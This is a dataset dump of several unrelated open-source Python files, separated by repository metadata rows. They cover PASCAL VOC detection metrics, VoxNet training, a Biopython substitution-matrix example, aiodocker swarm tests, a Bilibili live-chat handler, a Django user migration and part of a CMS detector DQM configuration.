value is set to :obj:`numpy.nan`.
* **map** (*float*): The average of Average Precisions over classes.
"""
prec, rec = calc_detection_voc_prec_rec(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
iou_thresh=iou_thresh)
ap = calc_detection_voc_ap(prec, rec, use_07_metric=use_07_metric)
return {'ap': ap, 'map': np.nanmean(ap)}
def calc_detection_voc_prec_rec(
pred_bboxes, pred_labels, pred_scores, gt_bboxes, gt_labels,
gt_difficults=None,
iou_thresh=0.5):
"""Calculate precision and recall based on evaluation code of PASCAL VOC.
This function calculates precision and recall of
predicted bounding boxes obtained from a dataset which has :math:`N`
images.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
pred_bboxes (iterable of numpy.ndarray): An iterable of :math:`N`
sets of bounding boxes.
Its index corresponds to an index for the base dataset.
Each element of :obj:`pred_bboxes` is a set of coordinates
of bounding boxes. This is an array whose shape is :math:`(R, 4)`,
where :math:`R` corresponds
to the number of bounding boxes, which may vary among boxes.
The second axis corresponds to
:math:`y_{min}, x_{min}, y_{max}, x_{max}` of a bounding box.
pred_labels (iterable of numpy.ndarray): An iterable of labels.
Similar to :obj:`pred_bboxes`, its index corresponds to an
index for the base dataset. Its length is :math:`N`.
pred_scores (iterable of numpy.ndarray): An iterable of confidence
scores for predicted bounding boxes. Similar to :obj:`pred_bboxes`,
its index corresponds to an index for the base dataset.
Its length is :math:`N`.
gt_bboxes (iterable of numpy.ndarray): An iterable of ground truth
bounding boxes
whose length is :math:`N`. An element of :obj:`gt_bboxes` is a
bounding box whose shape is :math:`(R, 4)`. Note that the number of
bounding boxes in each image does not need to be same as the number
of corresponding predicted boxes.
gt_labels (iterable of numpy.ndarray): An iterable of ground truth
labels which are organized similarly to :obj:`gt_bboxes`.
gt_difficults (iterable of numpy.ndarray): An iterable of boolean
arrays which is organized similarly to :obj:`gt_bboxes`.
This tells whether the
corresponding ground truth bounding box is difficult or not.
By default, this is :obj:`None`. In that case, this function
considers all bounding boxes to be not difficult.
iou_thresh (float): A prediction is correct if its Intersection over
Union with the ground truth is above this value..
Returns:
tuple of two lists:
This function returns two lists: :obj:`prec` and :obj:`rec`.
* :obj:`prec`: A list of arrays. :obj:`prec[l]` is precision \
for class :math:`l`. If class :math:`l` does not exist in \
either :obj:`pred_labels` or :obj:`gt_labels`, :obj:`prec[l]` is \
set to :obj:`None`.
* :obj:`rec`: A list of arrays. :obj:`rec[l]` is recall \
for class :math:`l`. If class :math:`l` that is not marked as \
difficult does not exist in \
:obj:`gt_labels`, :obj:`rec[l]` is \
set to :obj:`None`.
"""
total0 = 0
total1 = 0
for label in gt_labels:
for item in label:
if item == 0:
total0 += 1
else:
total1 += 1
print('true damaged:', total0,'true undamaged:',total1)
pred_bboxes = iter(pred_bboxes)
pred_labels = iter(pred_labels)
pred_scores = iter(pred_scores)
gt_bboxes = iter(gt_bboxes)
gt_labels = iter(gt_labels)
if gt_difficults is None:
gt_difficults = itertools.repeat(None)
else:
gt_difficults = iter(gt_difficults)
n_pos = defaultdict(int)
score = defaultdict(list)
match = defaultdict(list)
for pred_bbox, pred_label, pred_score, gt_bbox, gt_label, gt_difficult in \
six.moves.zip(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults):
if gt_difficult is None:
gt_difficult = np.zeros(gt_bbox.shape[0], dtype=bool)
for l in np.unique(np.concatenate((pred_label, gt_label)).astype(int)):
pred_mask_l = pred_label == l
pred_bbox_l = pred_bbox[pred_mask_l]
pred_score_l = pred_score[pred_mask_l]
# sort by score
order = pred_score_l.argsort()[::-1]
pred_bbox_l = pred_bbox_l[order]
pred_score_l = pred_score_l[order]
gt_mask_l = gt_label == l
gt_bbox_l = gt_bbox[gt_mask_l]
gt_difficult_l = gt_difficult[gt_mask_l]
n_pos[l] += np.logical_not(gt_difficult_l).sum()
score[l].extend(pred_score_l)
if len(pred_bbox_l) == 0:
continue
if len(gt_bbox_l) == 0:
match[l].extend((0,) * pred_bbox_l.shape[0])
continue
# VOC evaluation follows integer typed bounding boxes.
pred_bbox_l = pred_bbox_l.copy()
pred_bbox_l[:, 2:] += 1
gt_bbox_l = gt_bbox_l.copy()
gt_bbox_l[:, 2:] += 1
iou = bbox_iou(pred_bbox_l, gt_bbox_l)
gt_index = iou.argmax(axis=1)
# set -1 if there is no matching ground truth
gt_index[iou.max(axis=1) < iou_thresh] = -1
del iou
selec = np.zeros(gt_bbox_l.shape[0], dtype=bool)
for gt_idx in gt_index:
if gt_idx >= 0:
if gt_difficult_l[gt_idx]:
match[l].append(-1)
else:
if not selec[gt_idx]:
match[l].append(1)
else:
match[l].append(0)
selec[gt_idx] = True
else:
match[l].append(0)
for iter_ in (
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults):
if next(iter_, None) is not None:
raise ValueError('Length of input iterables need to be same.')
n_fg_class = max(n_pos.keys()) + 1
prec = [None] * n_fg_class
rec = [None] * n_fg_class
for l in n_pos.keys():
score_l = np.array(score[l])
match_l = np.array(match[l], dtype=np.int8)
order = score_l.argsort()[::-1]
match_l = match_l[order]
tp = np.cumsum(match_l == 1)
fp = np.cumsum(match_l == 0)
# If an element of fp + tp is 0,
# the corresponding element of prec[l] is nan.
prec[l] = tp / (fp + tp)
print(tp[-1])
# print(fp)
# print(prec[l])
# break
# If n_pos[l] is 0, rec[l] is None.
if n_pos[l] > 0:
rec[l] = tp / n_pos[l]
return prec, rec
def calc_detection_voc_ap(prec, rec, use_07_metric=False):
"""Calculate average precisions based on evaluation code of PASCAL VOC.
This function calculates average precisions
from given precisions and recalls.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
prec (list of numpy.array): A list of arrays.
:obj:`prec[l]` indicates precision for class :math:`l`.
If :obj:`prec[l]` is :obj:`None`, this function returns
:obj:`numpy.nan` for class :math:`l`.
rec (list of numpy.array): A list of arrays.
:obj:`rec[l]` indicates recall for class :math:`l`.
If :obj:`rec[l]` is :obj:`None`, this function returns
:obj:`numpy.nan` for class :math:`l`.
use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric
for calculating average precision. The default value is
:obj:`False`.
Returns:
~numpy.ndarray:
This function returns an array of average precisions.
The :math:`l`-th value corresponds to the average precision
for class :math:`l`. If :obj:`prec[l]` or :obj:`rec[l]` is
:obj:`None`, the corresponding value is set to :obj:`numpy.nan`.
"""
n_fg_class = len(prec)
ap = np.empty(n_fg_class)
for l in six.moves.range(n_fg_class):
if prec[l] is None or rec[l] is None:
ap[l] = np.nan
continue
if use_07_metric:
# 11 point metric
ap[l] = 0
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec[l] >= t) == 0:
p = 0
else:
p = np.max(np.nan_to_num(prec[l])[rec[l] >= t])
ap[l] += p / 11
else:
# correct AP calculation
# first append sentinel values at the end
mpre = np.concatenate(([0], np.nan_to_num(prec[l]), [0]))
mrec = np.concatenate(([0], rec[l], [1]))
mpre = np.maximum.accumulate(mpre[::-1])[::-1]
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap[l] = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
| 40.77044
| 79
| 0.593598
|
4a18b3b643807b91152d740b2b7c26bb88f8fc1b
| 3,725
|
py
|
Python
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 6
|
2020-01-29T07:24:14.000Z
|
2022-03-16T10:05:25.000Z
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 6
|
2020-07-03T00:31:10.000Z
|
2021-09-10T07:45:01.000Z
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 5
|
2019-02-27T22:56:49.000Z
|
2019-08-24T19:01:41.000Z
|
import math, datetime, os
from voxnet import *
from volumetric_data import ShapeNet40Vox30
dataset = ShapeNet40Vox30()
voxnet = VoxNet()
p = dict() # placeholders
p['labels'] = tf.placeholder(tf.float32, [200, 6697])
p['loss'] = tf.nn.softmax_cross_entropy_with_logits(logits=voxnet[-2], labels=p['labels'])
p['loss'] = tf.reduce_mean(p['loss'])
p['l2_loss'] = tf.add_n([tf.nn.l2_loss(w) for w in voxnet.kernels])
p['correct_prediction'] = tf.equal(tf.argmax(voxnet[-1], 1), tf.argmax(p['labels'], 1))
p['accuracy'] = tf.reduce_mean(tf.cast(p['correct_prediction'], tf.float32))
p['learning_rate'] = tf.placeholder(tf.float32)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
p['train'] = tf.train.AdamOptimizer(p['learning_rate'], epsilon=1e-3).minimize(p['loss'])
p['weights_decay'] = tf.train.GradientDescentOptimizer(p['learning_rate']).minimize(p['l2_loss'])
# Hyperparameters
num_batches = 2147483647
batch_size = 64
initial_learning_rate = 0.001
min_learning_rate = 0.000001
learning_rate_decay_limit = 0.0001
num_batches_per_epoch = len(dataset.train) / float(batch_size)
learning_decay = 10 * num_batches_per_epoch
weights_decay_after = 5 * num_batches_per_epoch
checkpoint_num = 0
learning_step = 0
min_loss = 1e308
if not os.path.isdir('checkpoints'):
os.mkdir('checkpoints')
with open('checkpoints/accuracies.txt', 'w') as f:
f.write('')
with tf.Session() as session:
session.run(tf.global_variables_initializer())
for batch_index in xrange(num_batches):
learning_rate = max(min_learning_rate,
initial_learning_rate * 0.5**(learning_step / learning_decay))
learning_step += 1
if batch_index > weights_decay_after and batch_index % 256 == 0:
session.run(p['weights_decay'], feed_dict=feed_dict)
voxs, labels = dataset.train.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels,
p['learning_rate']: learning_rate, voxnet.training: True}
session.run(p['train'], feed_dict=feed_dict)
if batch_index and batch_index % 512 == 0:
print("{} batch: {}".format(datetime.datetime.now(), batch_index))
print('learning rate: {}'.format(learning_rate))
feed_dict[voxnet.training] = False
loss = session.run(p['loss'], feed_dict=feed_dict)
print('loss: {}'.format(loss))
if (batch_index and loss > 1.5 * min_loss and
learning_rate > learning_rate_decay_limit):
min_loss = loss
learning_step *= 1.2
print("decreasing learning rate...")
min_loss = min(loss, min_loss)
if batch_index and batch_index % 2048 == 0:
num_accuracy_batches = 30
total_accuracy = 0
for x in xrange(num_accuracy_batches):
voxs, labels = dataset.train.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels, voxnet.training: False}
total_accuracy += session.run(p['accuracy'], feed_dict=feed_dict)
training_accuracy = total_accuracy / num_accuracy_batches
print('training accuracy: {}'.format(training_accuracy))
num_accuracy_batches = 90
total_accuracy = 0
for x in xrange(num_accuracy_batches):
voxs, labels = dataset.test.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels, voxnet.training: False}
total_accuracy += session.run(p['accuracy'], feed_dict=feed_dict)
test_accuracy = total_accuracy / num_accuracy_batches
print('test accuracy: {}'.format(test_accuracy))
print('saving checkpoint {}...'.format(checkpoint_num))
voxnet.npz_saver.save(session, 'checkpoints/c-{}.npz'.format(checkpoint_num))
with open('checkpoints/accuracies.txt', 'a') as f:
f.write(' '.join(map(str, (checkpoint_num, training_accuracy, test_accuracy)))+'\n')
print('checkpoint saved!')
checkpoint_num += 1
| 35.141509
| 97
| 0.721342
|
4a18b43043d5f7a3e9e512a6e505fa07dde29e86
| 1,092
|
py
|
Python
|
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2000 Brad Chapman. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Example of generating a substitution matrix from an alignment."""
from __future__ import print_function
# Biopython
from Bio import SubsMat
from Bio import AlignIO
from Bio.Alphabet import IUPAC, Gapped
from Bio.Align import AlignInfo
# get an alignment object from a Clustalw alignment output
c_align = AlignIO.read("protein.aln", "clustal", alphabet=Gapped(IUPAC.protein))
summary_align = AlignInfo.SummaryInfo(c_align)
# get a replacement dictionary and accepted replacement matrix
# exclude all amino acids that aren't charged polar
replace_info = summary_align.replacement_dictionary(
["G", "A", "V", "L", "I", "M", "P", "F", "W", "S", "T", "N", "Q", "Y", "C"]
)
my_arm = SubsMat.SeqMat(replace_info)
print(replace_info)
my_lom = SubsMat.make_log_odds_matrix(my_arm)
print("log_odds_mat: %s" % my_lom)
print(my_lom.format())
| 29.513514
| 80
| 0.746337
|
4a18b4a57f7ef737234a4fd331388b8fc4a24829
| 1,738
|
py
|
Python
|
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from aiodocker.exceptions import DockerError
@pytest.mark.asyncio
async def test_nodes_list(swarm):
swarm_nodes = await swarm.nodes.list()
assert len(swarm_nodes) == 1
@pytest.mark.asyncio
async def test_nodes_list_with_filter(swarm):
filters = {"role": "manager"}
filtered_nodes = await swarm.nodes.list(filters=filters)
assert len(filtered_nodes) == 1
filters = {"role": "worker"}
filtered_nodes = await swarm.nodes.list(filters=filters)
assert len(filtered_nodes) == 0
@pytest.mark.asyncio
async def test_node_inspect(swarm):
swarm_nodes = await swarm.nodes.list()
node_id = swarm_nodes[0]["ID"]
hostname = swarm_nodes[0]["Description"]["Hostname"]
node = await swarm.nodes.inspect(node_id=hostname)
assert node_id in node['ID']
node = await swarm.nodes.inspect(node_id=node_id)
assert hostname in node["Description"]["Hostname"]
@pytest.mark.asyncio
async def test_node_remove(swarm):
swarm_nodes = await swarm.nodes.list()
node_id = swarm_nodes[0]["ID"]
with pytest.raises(DockerError) as err_info:
await swarm.nodes.remove(node_id=node_id)
assert "is a cluster manager and is a member" in str(err_info)
@pytest.mark.asyncio
async def test_node_update(swarm):
swarm_nodes = await swarm.nodes.list()
node_id, version = swarm_nodes[0]["ID"], swarm_nodes[0]["Version"]["Index"]
spec = {
"Availability": "active",
"Name": "special-node",
"Role": "manager",
'Labels': {
"new_label": "true"
}
}
await swarm.nodes.update(node_id=node_id, version=version, spec=spec)
node = await swarm.nodes.inspect(node_id=node_id)
assert node['Spec'] == spec
| 27.15625
| 79
| 0.682969
|
4a18b67c918247a76f327148626a8b8dd63a128f
| 4,575
|
py
|
Python
|
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from typing import *
from . import client as client_
from . import models
__all__ = (
'HandlerInterface',
'BaseHandler',
)
logger = logging.getLogger('blivedm')
# 常见可忽略的cmd
IGNORED_CMDS = (
'COMBO_SEND',
'ENTRY_EFFECT',
'HOT_RANK_CHANGED',
'HOT_RANK_CHANGED_V2',
'INTERACT_WORD',
'LIVE',
'LIVE_INTERACTIVE_GAME',
'NOTICE_MSG',
'ONLINE_RANK_COUNT',
'ONLINE_RANK_TOP3',
'ONLINE_RANK_V2',
'PK_BATTLE_END',
'PK_BATTLE_FINAL_PROCESS',
'PK_BATTLE_PROCESS',
'PK_BATTLE_PROCESS_NEW',
'PK_BATTLE_SETTLE',
'PK_BATTLE_SETTLE_USER',
'PK_BATTLE_SETTLE_V2',
'PREPARING',
'ROOM_REAL_TIME_MESSAGE_UPDATE',
'STOP_LIVE_ROOM_LIST',
'SUPER_CHAT_MESSAGE_JPN',
'WIDGET_BANNER',
)
# 已打日志的未知cmd
logged_unknown_cmds = set()
class HandlerInterface:
"""
直播消息处理器接口
"""
async def handle(self, client: client_.BLiveClient, command: dict):
raise NotImplementedError
class BaseHandler(HandlerInterface):
"""
一个简单的消息处理器实现,带消息分发和消息类型转换。继承并重写_on_xxx方法即可实现自己的处理器
"""
def __heartbeat_callback(self, client: client_.BLiveClient, command: dict):
return self._on_heartbeat(client, models.HeartbeatMessage.from_command(command['data']))
def __danmu_msg_callback(self, client: client_.BLiveClient, command: dict):
return self._on_danmaku(client, models.DanmakuMessage.from_command(command['info']))
def __send_gift_callback(self, client: client_.BLiveClient, command: dict):
return self._on_gift(client, models.GiftMessage.from_command(command['data']))
def __guard_buy_callback(self, client: client_.BLiveClient, command: dict):
return self._on_buy_guard(client, models.GuardBuyMessage.from_command(command['data']))
def __super_chat_message_callback(self, client: client_.BLiveClient, command: dict):
return self._on_super_chat(client, models.SuperChatMessage.from_command(command['data']))
def __super_chat_message_delete_callback(self, client: client_.BLiveClient, command: dict):
return self._on_super_chat_delete(client, models.SuperChatDeleteMessage.from_command(command['data']))
# cmd -> 处理回调
_CMD_CALLBACK_DICT: Dict[
str,
Optional[Callable[
['BaseHandler', client_.BLiveClient, dict],
Awaitable
]]
] = {
# 收到心跳包,这是blivedm自造的消息,原本的心跳包格式不一样
'_HEARTBEAT': __heartbeat_callback,
# 收到弹幕
# go-common\app\service\live\live-dm\service\v1\send.go
'DANMU_MSG': __danmu_msg_callback,
# 有人送礼
'SEND_GIFT': __send_gift_callback,
# 有人上舰
'GUARD_BUY': __guard_buy_callback,
# 醒目留言
'SUPER_CHAT_MESSAGE': __super_chat_message_callback,
# 删除醒目留言
'SUPER_CHAT_MESSAGE_DELETE': __super_chat_message_delete_callback,
}
# 忽略其他常见cmd
for cmd in IGNORED_CMDS:
_CMD_CALLBACK_DICT[cmd] = None
del cmd
async def handle(self, client: client_.BLiveClient, command: dict):
cmd = command.get('cmd', '')
pos = cmd.find(':') # 2019-5-29 B站弹幕升级新增了参数
if pos != -1:
cmd = cmd[:pos]
if cmd not in self._CMD_CALLBACK_DICT:
# 只有第一次遇到未知cmd时打日志
if cmd not in logged_unknown_cmds:
# print("-------")
# print("---" + str(command))
# print("---" + str(cmd))
logger.warning('room=%d unknown cmd=%s, command=%s', client.room_id, cmd, command)
logged_unknown_cmds.add(cmd)
return
callback = self._CMD_CALLBACK_DICT[cmd]
if callback is not None:
await callback(self, client, command)
async def _on_heartbeat(self, client: client_.BLiveClient, message: models.HeartbeatMessage):
"""
收到心跳包(人气值)
"""
async def _on_danmaku(self, client: client_.BLiveClient, message: models.DanmakuMessage):
"""
收到弹幕
"""
async def _on_gift(self, client: client_.BLiveClient, message: models.GiftMessage):
"""
收到礼物
"""
async def _on_buy_guard(self, client: client_.BLiveClient, message: models.GuardBuyMessage):
"""
有人上舰
"""
async def _on_super_chat(self, client: client_.BLiveClient, message: models.SuperChatMessage):
"""
醒目留言
"""
async def _on_super_chat_delete(self, client: client_.BLiveClient, message: models.SuperChatDeleteMessage):
"""
删除醒目留言
"""
| 29.326923
| 111
| 0.646776
|
4a18b68d8bfad338022349ee05a7246a374a4a81
| 4,772
|
py
|
Python
|
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | null | null | null |
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | null | null | null |
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | 1
|
2021-04-21T09:41:43.000Z
|
2021-04-21T09:41:43.000Z
|
# Generated by Django 2.0.9 on 2018-11-06 15:43
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [("auth", "0009_alter_user_last_name_max_length")]
operations = [
migrations.CreateModel(
name="User",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("password", models.CharField(max_length=128, verbose_name="password")),
(
"last_login",
models.DateTimeField(
blank=True, null=True, verbose_name="last login"
),
),
(
"is_superuser",
models.BooleanField(
default=False,
help_text="Designates that this user has all permissions without explicitly assigning them.",
verbose_name="superuser status",
),
),
(
"username",
models.CharField(
error_messages={
"unique": "A user with that username already exists."
},
help_text="Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.",
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()
],
verbose_name="username",
),
),
(
"first_name",
models.CharField(
blank=True, max_length=30, verbose_name="first name"
),
),
(
"last_name",
models.CharField(
blank=True, max_length=150, verbose_name="last name"
),
),
(
"email",
models.EmailField(
blank=True, max_length=254, verbose_name="email address"
),
),
(
"is_staff",
models.BooleanField(
default=False,
help_text="Designates whether the user can log into this admin site.",
verbose_name="staff status",
),
),
(
"is_active",
models.BooleanField(
default=True,
help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
verbose_name="active",
),
),
(
"date_joined",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="date joined"
),
),
(
"groups",
models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
(
"user_permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
],
options={
"verbose_name": "user",
"verbose_name_plural": "users",
"abstract": False,
},
managers=[("objects", django.contrib.auth.models.UserManager())],
)
]
| 36.992248
| 138
| 0.398575
|
4a18b6d4d6d2d9124e1cf649cccc604928308adb
| 32,686
|
py
|
Python
|
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | 2
|
2020-05-09T16:03:43.000Z
|
2020-05-09T16:03:50.000Z
|
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | null | null | null |
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import FWCore.ParameterSet.Config as cms
import sys
from Configuration.Eras.Era_Run2_2018_pp_on_AA_cff import Run2_2018_pp_on_AA
process = cms.Process("SiStrpDQMLive", Run2_2018_pp_on_AA)
process.MessageLogger = cms.Service("MessageLogger",
debugModules = cms.untracked.vstring('siStripDigis',
'siStripClusters',
'siStripZeroSuppression',
'SiStripClusterizer'),
cout = cms.untracked.PSet(threshold = cms.untracked.string('ERROR')),
destinations = cms.untracked.vstring('cout')
)
live=True
unitTest=False
if 'unitTest=True' in sys.argv:
live=False
unitTest=True
# uncomment for running on lxplus
#live=False
offlineTesting=not live
#print "live: "+str(live)+" ==> offlineTesting: "+str(offlineTesting)
#----------------------------
# Event Source
#-----------------------------
# for live online DQM in P5
if (unitTest):
process.load("DQM.Integration.config.unittestinputsource_cfi")
elif (live):
process.load("DQM.Integration.config.inputsource_cfi")
# for testing in lxplus
elif(offlineTesting):
process.load("DQM.Integration.config.fileinputsource_cfi")
#----------------------------
# DQM Live Environment
#-----------------------------
#from DQM.Integration.config.environment_cfi import HEAVYION
#process.runType.setRunType('cosmic_run')
#process.runType.setRunType('pp_run')
process.load("DQM.Integration.config.environment_cfi")
process.DQM.filter = '^(SiStrip|Tracking)(/[^/]+){0,5}$'
process.dqmEnv.subSystemFolder = "SiStrip"
process.dqmSaver.tag = "SiStrip"
process.dqmSaver.backupLumiCount = 30
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
process.dqmEnvTr = DQMEDAnalyzer('DQMEventInfo',
subSystemFolder = cms.untracked.string('Tracking'),
eventRateWindow = cms.untracked.double(0.5),
eventInfoFolder = cms.untracked.string('EventInfo')
)
#-----------------------------
# Magnetic Field
#-----------------------------
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
#-------------------------------------------------
# GEOMETRY
#-------------------------------------------------
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
#--------------------------
# Calibration
#--------------------------
# Condition for P5 cluster
if (live):
process.load("DQM.Integration.config.FrontierCondition_GT_cfi")
# Condition for lxplus: change and possibly customise the GT
elif(offlineTesting):
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise
#you may need to set manually the GT in the line below
process.GlobalTag = gtCustomise(process.GlobalTag, 'auto:run2_data', '')
#--------------------------------------------
## Patch to avoid using Run Info information in reconstruction
#
process.siStripQualityESProducer.ListOfRecordToMerge = cms.VPSet(
cms.PSet( record = cms.string("SiStripDetVOffRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripDetCablingRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadChannelRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadFiberRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadModuleRcd"), tag = cms.string("") )
)
#-------------------------------------------
#-----------------------
# Reconstruction Modules
#-----------------------
## Collision Reconstruction
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
## Cosmic Track Reconstruction
if (process.runType.getRunType() == process.runType.cosmic_run or process.runType.getRunType() == process.runType.cosmic_run_stage1):
process.load("RecoTracker.Configuration.RecoTrackerP5_cff")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")
else:
process.load("Configuration.StandardSequences.Reconstruction_cff")
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
#
# Strip FED check
#
process.load("DQM.SiStripMonitorHardware.siStripFEDCheck_cfi")
process.siStripFEDCheck.RawDataTag = cms.InputTag("rawDataCollector")
process.siStripFEDCheck.DirName = cms.untracked.string('SiStrip/FEDIntegrity_SM/')
process.siStripFEDCheck.doPLOTfedsPresent = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTfedFatalErrors = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTfedNonFatalErrors = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTnFEDinVsLS = cms.bool(True)
process.siStripFEDCheck.doPLOTnFEDinWdataVsLS = cms.bool(True)
#------------------------------
# Strip and Tracking DQM Source
#------------------------------
process.load("DQM.SiStripMonitorClient.SiStripSourceConfigP5_cff")
process.load("DQM.TrackingMonitorSource.TrackingSourceConfigP5_cff")
process.TrackMon_gentk.doLumiAnalysis = False
process.TrackMon_ckf.doLumiAnalysis = False
process.TrackMon_hi.doLumiAnalysis = False
process.TrackMon_ckf.AlgoName = 'CKFTk'
#--------------------------
# Quality Test
#--------------------------
from DQMServices.Core.DQMQualityTester import DQMQualityTester
process.stripQTester = DQMQualityTester(
qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config.xml'),
prescaleFactor = cms.untracked.int32(3),
getQualityTestsFromFile = cms.untracked.bool(True),
qtestOnEndLumi = cms.untracked.bool(True),
qtestOnEndRun = cms.untracked.bool(True)
)
process.trackingQTester = DQMQualityTester(
qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config.xml'),
prescaleFactor = cms.untracked.int32(3),
getQualityTestsFromFile = cms.untracked.bool(True),
qtestOnEndLumi = cms.untracked.bool(True),
qtestOnEndRun = cms.untracked.bool(True)
)
#--------------------------
# Service
#--------------------------
process.AdaptorConfig = cms.Service("AdaptorConfig")
# Simple filter for event
process.eventFilter = cms.EDFilter("SimpleEventFilter",
# EventsToSkip = cms.untracked.int32(3)
EventsToSkip = cms.untracked.int32(100)
)
#--------------------------
# Producers
#--------------------------
# Event History Producer
process.load("DPGAnalysis.SiStripTools.eventwithhistoryproducerfroml1abc_cfi")
# APV Phase Producer
process.load("DPGAnalysis.SiStripTools.apvcyclephaseproducerfroml1tsDB_cfi")
#--------------------------
# Filters
#--------------------------
# HLT Filter
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter = cms.EDFilter("HLTTriggerTypeFilter",
SelectedTriggerType = cms.int32(1)
)
# L1 Trigger Bit Selection (bit 40 and 41 for BSC trigger)
process.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')
process.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')
